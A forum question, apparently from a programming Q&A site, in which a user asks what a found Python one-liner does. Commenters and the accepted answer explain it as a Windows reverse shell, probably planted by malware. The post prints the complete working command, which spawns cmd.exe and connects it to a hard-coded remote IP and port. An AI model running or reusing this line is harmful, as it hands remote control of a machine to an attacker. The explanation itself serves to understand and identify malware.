# Where does the code connect to and what does it do then?

Tags: python

```
python.exe -c "import socket,os,threading,subprocess as sp;p=sp.Popen(['cmd.exe'],stdin=sp.PIPE,stdout=sp.PIPE,stderr=sp.STDOUT);s=socket.socket();s.connect(('156.25.32.145',5551));threading.Thread(target=exec,args=(\"while(True):o=os.read(p.stdout.fileno(),1024);s.send(o)\",globals()),daemon=True).start();threading.Thread(target=exec,args=(\"while(True):i=s.recv(1024);os.write(p.stdin.fileno(),i)\",globals())).start()"
```

Found this code and wanted to know what it does

Comment: It connects to `156.25.32.145` port `5551` -- isn't that obvious?

Comment: This is a reverse shell. It connects to the control server, then executes whatever commands the server sends back.

Comment: how would that work?

Comment: Do you understand what `sp.Popen(['cmd.exe'],stdin=sp.PIPE,stdout=sp.PIPE,stderr=sp.STDOUT)` does? It starts a CMD process that will execute the commands that are piped to it.

Answer (score 1, accepted):

This is a reverse shell, probably part of malware that was installed on your system.

First it starts a `cmd.exe` process with [`subprocess.Popen()`](https://docs.python.org/3/library/subprocess.html#subprocess.Popen) that reads input and writes output to pipes.

It connects a socket to the control server, IP 156.25.32.145 port 5551.

Then it starts two threads. One thread runs an infinite loop that reads from the output pipe of the subprocess and writes to the socket. The other thread runs an infinite loop that reads from the socket and writes to the input thread of the subprocess.

The threads shouldn't really be necessary. They could have opened the socket first, and then connected the subprocess's `stdin`, `stdout`, and `stderr` directly to the socket.